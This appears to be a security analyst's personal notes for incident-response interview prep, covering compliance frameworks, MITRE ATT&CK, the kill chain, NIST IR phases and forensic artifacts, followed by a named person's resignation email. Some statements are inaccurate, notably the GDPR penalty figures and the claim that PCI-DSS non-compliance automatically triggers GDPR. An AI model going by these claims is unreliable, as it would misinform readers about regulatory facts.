Malicious actor can take advantage of data transmitted in clear text. We advise to
encrypt the data with a reliable encryption scheme before transmitting.
SSL TLS FTPS with DES AES RSA

CCPA - California Consumer Privacy Act

The intention of this is to provide California residents with the rights to know
what personal data is being collected about them, whether their personal data is
sold or disclosed, their rights to access their personal data if they want it and
not to be discriminated for exercising their privacy.

HIPAA - Health Insurance Portability and Accountability Act

is a series of national standards that healthcare organizations must have in place
in order to safeguard the privacy and security of PHI
PHI - Protected Health Information
is any demographic individually identifiable information that can be used to
identify a patient.
PHI identifiers are address, email, medical records, account numbers, digital
identifiers, biometrics etc etc.
Two types of organizations who need to be HIPAA compliant, Covered Entities and
Business Associates.
Covered Entities are involved in the direct creation of PHI and must be compliant
with the full extent of HIPAA regulation.
HIPAA regulation defines a covered entity as healthcare providers, health plans,
and healthcare clearinghouses involved in the transmission of PHI.
A business associate is any organization hired by a covered entity who will
encounter PHI over the course of work they’ve been hired to perform.
HIPAA Privacy Rule protects PHI from unauthorized use or disclosure.
HIPAA Security Rule requires appropriate safeguards to be in place to maintain the
CIA of ePHI. Healthcare organizations must implement physical, technical, and
administrative safeguards to secure patient information.
HIPAA Breach Notification Rule outlines the processes that HIPAA-beholden entities
must follow in the event of a data breach.
HIPAA Omnibus Rule mandates that business associates must be HIPAA compliant.
Consequences:
Fines from the state and federal government.
Loss of CIA of valuable organizational data.
Lawsuits, loss of public trust, internal disciplinary action or termination of
employment.
Requirements for HIPAA compliance
STEP 1: Annual Audits
STEP 2: Remediation Plans
STEP 3: Policies and procedures
STEP 4: Documentation
STEP 5: Business Associate Management
STEP 6: Incident Management

GDPR - General Data Protection Regulation

It's a regulation in EU law for data protection and privacy. It's very strict on
what companies can do with personal data and how they use it, even sexual
preference or political opinion kind of thinks is on their scope. I heard its a
massive thing because of the penalties or fines for non compliance its really big,
more than 20 million dollars or 3% annual income of the company. I believe if you
are non compliant with PCI/DSS automatically you are hit by GDPR because of PII.
If I need to deep dive on this compliance things I can work on it.

ITIL - Information Technology Infrastructure Library

It's a set of practices for IT activities like IT service management, asset
management. If we are using ITIL framework on our organization, theres a processes,
procedures, checklists that we need to follow. It establish the baseline on what we
can implement, and measure improvement that we need.

NIST - National Institute of Standards & Technology SP 800-61

It's the Computer Security Incident Handling Guide
Preparation, Detection & Analysis, Containment, Eradication & Recovery, Post-
Incident Activity

ISO/IEC 27001 - International Organization for Standardization / International

Electrotechnical Commission
It's an international standard on how to manage information security. It details
the requirements for establishing, implementing, maintaining and continually
improving an information security management system (ISMS) to help the
organizations make their assets more secure.

COBIT - Control Objectives for Information and Related Technology

is a framework that aims to help organizations that are looking to develop,
implement, monitor, and improve IT governance and information management. It also
ties in with ITIL & ISO 27000. I think it's also identified into 5 processes like:
Evaluate, Direct and Monitor (EDM)
Align, Plan and Organize (APO)
Build, Acquire and Implement (BAI)
Deliver, Service and Support (DSS)
Monitor, Evaluate and Assess (MEA)

OSINT - Open Source INTelligence

SOCMINT - SOCial Media INTelligence
SOX - Sarbanes-Oxley Act
FISMA - Federal Information Security Management Act of 2002
GLBA - Gramm–Leach–Bliley Act

IEC 62443
ICS/SCADA
Industrial control systems (ICS) are often managed via a Supervisory Control and
Data Acquisition (SCADA) systems that provides a GUI for operators to easily
observe the status of a system, receive any alarms indicating out-of-band
operation, or to enter system adjustments to manage the processes.

Triage Acquisition: "Quick WIN Forensics" using Live Response Collection/KAPE

We will perform this to get security artifacts that will make our investigation
more faster, we will not wait for the full disk image of the entire hard drive to
be finished before starting the investigation.
Your manager says that there is a confidential file that was accessed by an unknown
employee and they are suspecting George. Tell me if he really access the
confidential file using his machine and when was the time he access that? Only 2
questions that we need to answer, are we going to perform full disk image of the
entire hard drive? No! As an IR I will perform Triage Acquisition: "Quick WIN
Forensics" using Live Response Collection/KAPE.
Who was the employee that access the confidential file?
I can check the prefetch file maybe he execute winword or a pdf, because that is
the file format.
This is windows artifact that gives you information for all executions that is
happening on the endpoint.
I can take a look on the LNK file and jump list on George's machine, because I
would see there what are the recent file that was accessed by the user.
If he really access the file, I would also check the master file table just to make
sure of it, maybe its George machine but its not his credentials.
Security Logs, Application Logs, ALL of the Windows Event Logs, Jumplist, Registry
Hives, Prefetch, Browser History, LNK Files, Master File Table, File System,
Emails, Shell Bag, Etc Etc.

Core Sources of Evidence (Non-Volatile)

Network Information, Startup Applications, Running Process Related Information
Open Shares, Mapped Drives, Scheduled Task, DNS Cache, File Timeline
Windows Services, Persistence Mechanism, Artifacts of Execution
File System Metadata, Windows Registry, Windows Event Logs
Typed URL's, Audit Policy, USB Related, Firewall Configuration
Drivers Installed and Running, DLL's Created, Opened Files

pyramid of pain it was created by David Bianco a famous guy and sans instructor
this framework is created to give a highlight of what are the different artifacts
and what is the impact to the adversaries if we detected this from defensive
approach

the pyramid of pain is consists of 6 different levels, from the bottom its
hash values - trivial
ip address - easy
domain names - simple
network/host artifacts- annoying
tools - challenging
ttps - tough!

lets say im the attacker and the defenders are able to detect the hash value of the
file that im using, that's gonna be trivial to me. i can easily change a single
character on my code, save it, compile it an then i will have a new hash value, in
just a snap i can easily change the hash value of it.

and then you find my ip address, as a defender you wil block it and for me that's
easy. i dont care because i can easily spin up some cloud instance and it will give
me new public ip address and then i can intercept to your network again.

how about domain name? sometimes adversaries don't really care about domain names,
they can simply register some weird domain name with a tld of .win .vip. tk .kim
for free and they can use it as a c2 channel. that's very simple for them.

how about network/host artifacts? lets say as a good defender, you have a detection
strategy that for every executable file that is drop on the %Temp folder give me an
alert. that's gonna be annoying to me because for almost all of my attack
methodology i'm used to it.

and if you also have a good detection strategy for the tools like mimikatz for
credential dumping or cobalt strike if there's a pipe on the event and network logs
ow that's gonna be challenging to me.

and know the top of the pyramid the ttps. its already 2021 and you know, we are not
just focusing or detecting external attacks like port scanning and other related
attempts to our external network, we are also focusing now on the behavioral kind
of things. its not just about hashes, ip addresses, domain names and other ioc's,
but we are also detecting based on the behavior of a certain attack. for example
phishing. common behavior of this technique is sending email and when the target
receive it, there will be a certain link or attachement that has excel that ask the
user to enable the macros and once its enabled it will spawn cmd or powershell on
the background. the behavior, the logic behind this technique is the parent and
child relationship where in the file is spawning cmd or powershell, thats the
ttps, there are 14 tactics, 185 techniques and i think 367 sub techniques you know
there's a lot to digest there.

Mitre is a nonprofit organization. It works in the public interest of governments

and other industries.
They are always innovating, to help everyone that is working in the cyber world.
Mitre ATT&CK - It's a free framework of adversary TTP's based on real-world
observations.
Reconnaissance, Resource Development
Initial Access, Execution
Persistence, Privilege Escalation
Defense Evasion, Credential Access
Discovery, Lateral Movement
Collection, Command and Control
Exfiltration, Impact
Mitre SHIELD - They call it, active defense, this is pretty new, they are
developing it organize what we need to do on adversary engagements.
Channel, Collect, Contain, Detect, Disrupt, Facilitate, Legitimize, Test
Mitre D3FEND

A: Advanced P: Persistent T: Threat

Targeted, Coordinated, Purposeful Month after Month, Year after Year
Persons with Intent, Opportunity, and Capability
Lockheed Martin Cyber Kill Chain - It's a standard framework model for the
identification and prevention of cyber intrusion activity. It identifies what the
adversaries must complete or the phases in order to achieve their objective.
Reconnaissance - Enumeration employees, services, etc.
Weaponization - Creating a file with exploit included
Delivery - Transferring exploit to the victim
Exploitation - Asset exploited, unauthorized code run
Installation - Malicious code executes/installs
Command & Control - remote control of asset
Action on Objectives - exfiltration/destroy of data

Just a caveat here, sometimes It doesn't need to be always starting at the

reconnaissance phase, sometimes adversary was just exploiting the whole universe
kind of thing, wherein if there is a public exploit that is available, For example,
regarding microsoft exchange, they will just perform a massive scan of all exchange
server that is accessible publicly, and if its still vulnerable drop my exploit,
something like that.
But ideally an adversary that is attacking our organization will do 1st a
reconnaissance and it will create the exploit itself maybe they find some
vulnerabilites to our organization, that is the weaponization and they also need to
find a way how can they deliver the exploit like phishing or maybe they will drop a
flash drive in the organization parking area and some associates there will open
and click the files on their unit, that would the start the exploitation, it will
install some additional components of the payload to do the whole spectrum of the
attack and everything, after that it will have a successful connection to the C2
channels that was prepared and that is where they will do the action on objective,
it might be data exfiltration, modfying the website or deleting the database.

Reconnaissance - Enumeration employees, services, etc.

Identify targets to attack: Staff email addresses and phone numbers, Enumerate
public facing hosts and systems. Fingerprint exposed services: Identify potential
vulnerabilities in these services. Identify third party connections or providers.
Collect contextual target information.

Weaponization - Creating a file with exploit included

Analyze reconnaissance collected data, Determine an appropriate initial access
vector, Stand up the attack infrastructure, Attack can be through social
engineering or technical compromise.

Delivery - Transferring exploit to the victim

Exploitation - Asset exploited, unauthorized code run

Installation - Malicious code executes/installs

Command & Control - remote control of asset

Action on Objectives - exfiltration/destroy of data

Incident Response Procedure Overview
IR procedures are the specific techniques and processes to use in an incident.
Organized into the following phases based on NIST SP 800-61
NIST: National Institute of Standards and Technology
This are the procedures.
Preparation, Detection & Analysis, Containment, Eradication & Recovery, Post-
Incident Activity

Preparation: IR GO Bag or "Jump Bag" or Attack Bag

Gather IR hardware and software ahead of time
Hardware and tools to include:
High power laptop, External hard drives / USB drives (forensically wiped)
Write blockers, Network taps, cables, small switch, Bootable Linux live CD, Gold
build image
Software and tools to include:
Live and dead box disk acquisition - FTK Imager, MagnetAcquire, SIFT, Paladin
Local and remote memory acquisition and analysis - WinPmem, FResponse, XWays,
MagnetRamCapture, Rekall, Volatility
Network acquisition and analysis software - SecurityOnion, Zeek, Suricata,
Networkminer, Wireshark
External hard drives because a lot of times you will be needing a more storage
because you will be getting a lot of artifacts like and image, network logs that
can contain 10gigs of data or 100gigs of data
write blockers used to make sure the confidentiality aswell as integrity of the
data is intact
network taps if you want to mirror the traffic at all
bootable linux becuase some times you will be using linux machine for tools
purposes
during our current investigation there are live and dead box disk acquisition where
in theres a live data you can use some sort of tools to get the memory dump or the
entire image of the hard disk then you can just mount it to your machine and then
get the necessary files, so for getting the hard disk image we can use ftk imager.
getting memory dump very very useful when it comes to incident response because you
will be surprise a lot of data is traversing through memory and if you dont have
the memory dump it could be hard for you. getting memory acquisition when you are
doing IR are very recommended. we can use some tools like volatility for analyzing
it. and some network acquisition sometimes you will be in the scene that thers an
active ransomeware or active campaign from different apt so you need to tap on
their network or maybe you need to get the network data so this is the tools that
you can user their.

Detection & Analysis

Many possible sources for detecting an incident
Network device (e.g. firewall, IDS, IPS)
Host logs (e.g. sysmon, WinEVT)
Admins and users noticing something isn't right
Threat intelligence feeds
Third party notifications
The first decision is always verification
Do you have an incident, or is it a false positive?
Sometimes easy, such as a website defacement
Sometimes difficult, requiring a full forensic examination
This are the data sources that we need to have when it comes to our detection and
analysis, where capturing this data but what are this data sources so we can get
those data sources from different network devices could be from firewall ips ids
switch even router and from the host logs through sysmon and winevt the default one
you cannot just investigate with out the logs itself this are what we call data
sources and of course we need to have some threat intelligence feeds as well lets
say this ip address was used to ransomweare that happen last month then suddenly
you have an idea this might be the same scenario this must be the same case or
might be the same threat actors that attacking our system that just deploy
ransomeware last month on our competitor. you notice a lot of ransomware artifacts
and then you might be thinking this could be possibly ransomware but after spending
couple of hours dealing with the data that you just acquired suddenly you just
notice that this is more than ransomware this is an active campaign related to
ransomware and webshell and diffrent things.

Time to do the real deal. Once an incident is declared

Assign the incident handler / lead
Collect data from key NSM/CSM data sources
Understand who owns the asset and what it does
Identify any compliance and/or safety issues
Categorize the incident
Begin remote live-box investigation if required
so you need to contact some entities ypu need to contact your manager like hey
manager theres and incident and we are deploying our IR now to investigate further
and to perform containment and eradication and this incident is categorize as p1
because attacker was able to get some data already and we need to stop them as soon
as possible so about time to do the containment

Containment Procedure - Stop the bleeding phase

you try to stop the bleeding like you wanna stop the impact and minimzing the risk
of the incident like isolation of the vlans lets say the compromise machine is
coming from hr you just need to isolate it or reroute it into your test vlan or you
can block some specific ip address for example you can see that theres some russian
or north korean ips connecting to our system today and this are the ip address that
use to attack our system or block the whole region like for any russian and north
korean ip automatically block it because we dont have any business with them at all
you can also block the ports to my surprise alot of attackers ang still using non
common ports so you can also block those ports and if you have some edr platform in
your company you can block some hashes and some applications and binaries if the
attackers is using this.
we can also perform some short term containment and long term containment so if you
are dealing with incidents we are not just waiting for the evidence so by looking
into the 1st content of the incident let says the IT says they are being attack by
ransomware but they need to wait for a couple of times before they get the logs
becuase its like an international shipping or maybe they cannot do some remote
uploading of artifacts what you could do there is to perform a short term
containment here are the steps that you can perform as a remediation so you wont
infect the other systems or maybe you can help the it folks to go to there edr
platform and perform some triage activities and look at what is the patiend zero
when this incident started and when this incident or what are those infected
machine is related so alteaast you are doing worrh it your time not just waitting
for the logs to be shipped to you

Triage Acquisition: "Quick WIN Forensics" using Live Response Collection/KAPE

We will perform this to get security artifacts that will make our investigation
more faster, we will not wait for the full disk image of the entire hard drive to
be finished before starting the investigation.
Your manager says that there is a confidential file that was accessed by an unknown
employee and they are suspecting George. Tell me if he really access the
confidential file using his machine and when was the time he access that? Only 2
questions that we need to answer, are we going to perform full disk image of the
entire hard drive? No! As an IR I will perform Triage Acquisition: "Quick WIN
Forensics" using Live Response Collection/KAPE.
Who was the employee that access the confidential file?
I can check the prefetch file maybe he execute winword or a pdf, because that is
the file format.
This is windows artifact that gives you information for all executions that is
happening on the endpoint.
I can take a look on the LNK file and jump list on George's machine, because I
would see there what are the recent file that was accessed by the user.
If he really access the file, I would also check the master file table just to make
sure of it, maybe its George machine but its not his credentials.
Security Logs, Application Logs, ALL of the Windows Event Logs, Jumplist, Registry
Hives, Prefetch, Browser History, LNK Files, Master File Table, File System,
Emails, Shell Bag, Etc Etc.
Core Sources of Evidence (Non-Volatile)
Network Information, Startup Applications, Running Process Related Information
Open Shares, Mapped Drives, Scheduled Task, DNS Cache, File Timeline
Windows Services, Persistence Mechanism, Artifacts of Execution
File System Metadata, Windows Registry, Windows Event Logs
Typed URL's, Audit Policy, USB Related, Firewall Configuration
Drivers Installed and Running, DLL's Created, Opened Files

Eradication Procedure - Full removal of the remnants or the artifacts of the

attackers in the environment.
eradication more of removing the artefacts removing all this malware this processes
if ever they put some files in my %Temp, %AppData, %Public, %Downloads folder which
are the directories kinda favorite of malware, its about time to remove it. lets
say there is a persistence there is a schedule task that keeps on running every 15
minutes that connects back to into the C2 of the attacker from the eradication
phase we have to delete that so they dont have access all over again, its also the
time to scan the whole system for posibble malware outbreak things and patch the
system during eradication phase maybe there is a vulnerability on our microsoft
exchange

Recovery Procedure
some sort of rebuilding the server or maybe rebulding the image of the infected
machine using verified back up we can restore all the activities softwares the
thing that i can see in the soc stand point is that they always put the server into
the production without asking the business owner so for example you contained a
specific server and then theres no approval from the business owner like you have
to ask them if ever the applications are running maybe they are running sap system
maybe they are running some erp system and suddenly you rebuild this server and
then if they are not working on their end and once you put it back to production
then we are addressing some lost of confidence to our security team my suggestion
create a template where in you can ask the business owner before you put back the
server into the production test the system if all the application is really working
before we can close the ticket before we can say okay we are done with the recovery
stage

Post Incident Activity which is super very important

because this is the stage where in you will realize ow i miss something there we
dont have detection in credentials abuse maybe when someone is performing lateral
movement like we are missing some detection on that i dont have i visibility on
there maybe next time i will write a detection enginerring or logic that will
identify if someone is moving from 1 place to another so that is the beauty of post
incident activity and maybe you can discuss some vulnerability management approach
becuase the attacker was able to get into the system because you have a vulnerable
webapp so by leveraging that vulnerable web app he was able to put a web shell lets
say my post oncident actvuity says tyhat we will be having some schedule
vulnberability sacannibng and vulnerability managemnet wehave to catch those
critical once and pperfoirm some change management with cab approval those itil
process framework that you need to follow, its a lesson learn meeting that need to
taking place when theres an incident

1. What are the tools that you can use to get static information of a certain PE?
CFF Explorer, PE Studio, CAPA, Sysinternal Suites.

2. How would you analyze packet capture? Do you use any tools for such?
Wireshark, Bruteshark, Tshark, TCPDump, Network Miner, Moloch or Arkime.

3. Do you normally upload sample files in VT or HA to get an immediate result? What

can you do if you are not allowed to upload files from this public repository?
No, due to OPSEC, we don't upload any sample files coming from our internal
network. We cannot just do that, because it might contain sensitive information
against our organization. What we can do is get the metadata of it specially the
hash value of the file and perform a hash search through VT or HA.

4. How do you classify low-impact malware to high-impact malware?

We can use the AV event analysis cheatsheet created by Florian Roth. So it depends
on the alert signatures as well as the locations if something is running from the
flash drive I might say its just people keep on inserting their drives and I don't
know if their flash drive contains their personal files, but what if the alert is
coming from the domain controller do you really need to prioritize that? Of course,
yes. What if malware is residing in a C:/Windows/system32 which is a restricted
folder for everybody, not everyone can put binary on this restricted folder unless
they are approved software, so what if theirs a malware on that? Do you prioritize
that or do just wait for SLA to happen? this cheat sheet can be very useful for
that.

5. What are the common folders where malware resides?

%Temp, %AppData, %Public, %Downloads, %Desktop, %RecycleBin and %WinSxS
WinSxS, stores multiple copies of dll, exe, and other system files to let multiple
applications run in Windows without any compatibility problem.
Since some malware is running inside the memory because of fileless attacks,
sometimes it can hide a copy of the payload inside %RecycleBin.
Registry Hives
HKEY_CURRENT_CONFIG System, System.alt, System.log, System.sav
HKEY_CURRENT_USER Ntuser.dat, Ntuser.dat.log
HKEY_LOCAL_MACHINE\SAM Sam, Sam.log, Sam.sav
HKEY_LOCAL_MACHINE\Security Security, Security.log, Security.sav
HKEY_LOCAL_MACHINE\Software Software, Software.log, Software.sav
HKEY_LOCAL_MACHINE\System System, System.alt, System.log, System.sav
HKEY_USERS\.DEFAULT Default, Default.log, Default.sav

1. In windows system, what is the location or directory where event logs are
stored?
The typical location if we are running windows vista up and above like windows 8
windows 10 and windows 11, those are being stored in C:\Windows\System32\winevt
folder that's the location of where event logs are being stored by the operating
system. Now, lets say you are running windows XP, where is the location? That would
be C:\Windows\System32\config folder and then you can see there the event logs
along with registry hives.

2. Phase in Cyber Kill Chain where the adversary performs enumerating employees,
services, etc.?
Reconnaissance,

3. Stage of Incident Response where fully clean up and removing the cause of the
incident occurs?
Eradication,

4. During the incident, immediately shut down the infected system and disconnect it
from the network? True or False?
False, if we shut down our machine its a very minimal chance that we can recover
the volatile data. We should get the memory dump first so we can investigate it
properly.

5. In IR, it is the process of restoring affected systems back to normal

operations.
This is what we call Recovery,

6. This is the type of analysis that focuses on the least frequent occurrence. It
allows analysis of large amount of data without drowning. Long Tail Analysis

7. How do you stay up-to-date with the latest infosec development related to IR?
Twitter, Twitter Deck it contains a lot of feeds related to Vulnerability
Assessment, Threat Intelligence, Malware Analysis, Digital Forensics, Cyber
Defense, Threat Hunting, Penetration Testing a lot. DFIR Report, Krebs On Security,
Hacker News, SANS.edu

Until it is my turn, I will keep clapping for others happily.

I feel that if I will be a successful candidate for this position, you will quickly
see a positive return on your investment.
I am very trainable and flexible with any work schedules and office locations.

Do you have any questions for us?

How would you describe the company's culture?
How has the role evolved over the years?
How do you see the company evolving over the next 5 to 10 years?
What advice would you give to the successful candidate who wants to excel in the
role?
What would you need me to focus on in the first 30 days of starting?
Why do you want to leave your current job?
I simply want to leave my current job because I feel I have reached my full
potential in the role, my employer has been amazing, we achieve lots of great
things together, but I am now ready for a fresh challenge. I will leave my employer
on a really good term, I am ready for a fresh challenge where I can put all the
skills and qualities that I develop to good use, at the same time learn some new
once.

Where do you see yourself in 5 years time?

Well, I certainly see myself, hopefully still working for your organization either
in the same role or perhaps having gained advancement to a more senior level if you
see me as a fit for the organization. I would also see myself fully trained up and
having progressed by developing different skills and qualities in the role and also
having undertaken lots of training courses to help me continue to contribute
positively to the team. Finally in 5 years time I would hope to have been seen as a
trustworthy member of the organization on someone who could perhaps help train up
new amends of staff as when they joined the business.

Describe yourself in 3 words?

The three words I would use to describe myself are results orientated, evolving and
energetic. So I am a results orientated because I will come in to this role and I
won't just carry out my normal day to day duties, I will actually strive to add
value to your company and achieve results time and time again. I am somebody who is
evolving, what I mean by that is I want to grow with your company as it progresses,
I have my own personal goals outside of work and I know that I will only achieve
those if I perform really well within my job so I will progress as your company
grows. Finally, I would say that I am energetic I believe I have a positive nature
I always view things positively and I believe that energetic enthusiasm always rubs
up positively on other team members.

Why should we hire you?

I believe you should hire me for 5 reasons. The first reason is I already have the
necessary experience that is a match for the job description. The second reason is
I have the necessary skills the qualities and the attributes to come into the role
and learn the position quickly. The third reason why I believe you should hire me
is because I'm the type of person who will always embrace change positively and I
understand that for a company to succeed it needs to continually change to make the
expectation of its customers and its clients. The fourth reason why you should hire
me is because I will always take responsibility for my own ongoing professional
development so I start the cutting edge of what's required for the role and finally
reason number five is I believe if you do hire me, you will quickly see a positive
return on your investment.

What is your biggest weakness?

I am aware of my weaknesses, my biggest weakness is the fact that I find it really
difficult to say no to people. In the past, this was meant that I sometimes take on
too much work, I become overwhelmed. I need to learn to be more mindful in
situations like this, so when somebody else needs my help I will always analyze my
current workload to see if I do have the capacity to take on the extra work.

Resignation - Christan George V. Senarillos

Hi Sir Joelle,

As I compose this email, every strike on keys feels like a stab in my heart.
This is one of the toughest and saddening decisions I ever had to make.
I am resigning from my post as a Tier 3 Network Security Analyst of the most
hardworking team I ever had the opportunity of being a part of... the MSOC.

It is nothing more than a career move. Everything else here in Masergy is superb.
I couldn't have asked for a more supportive and/or trusting superiors such as
yourself.
We couldn't have picked the perfect mix of individuals here in MSOC. The synergy
amongst all of them is always visible.

Salary-wise, I am actually quite pleased with what I am receiving. I couldn't thank

you enough for appreciating my work by putting a bump on it. Although it is not yet
in effect, your effort and recognition are what mattered the most to me.

I am moving into a role as a Senior Threat Detection and Response Consultant at

Ernst & Young, and I am going to lead another team of SOC analysts, the same way I
did here. The magnitude of work and responsibility is immense. I guess I am a
glutton for punishment. Somehow similar to the reason why I moved here, I was up
for the challenge of trying to improve the overall state of MSOC back then.

I hope I was able to deliver what was expected of me.

Thank you very much, Sir Joelle. You have always been so kind, helpful and
supportive.

Sometimes Pass (1.00) Most of the Time Fail (0.00) - Cutting Classes, Coin
Flipping, Billiards, Dota, Mixed Martial Arts, Food Trip, Social Drinking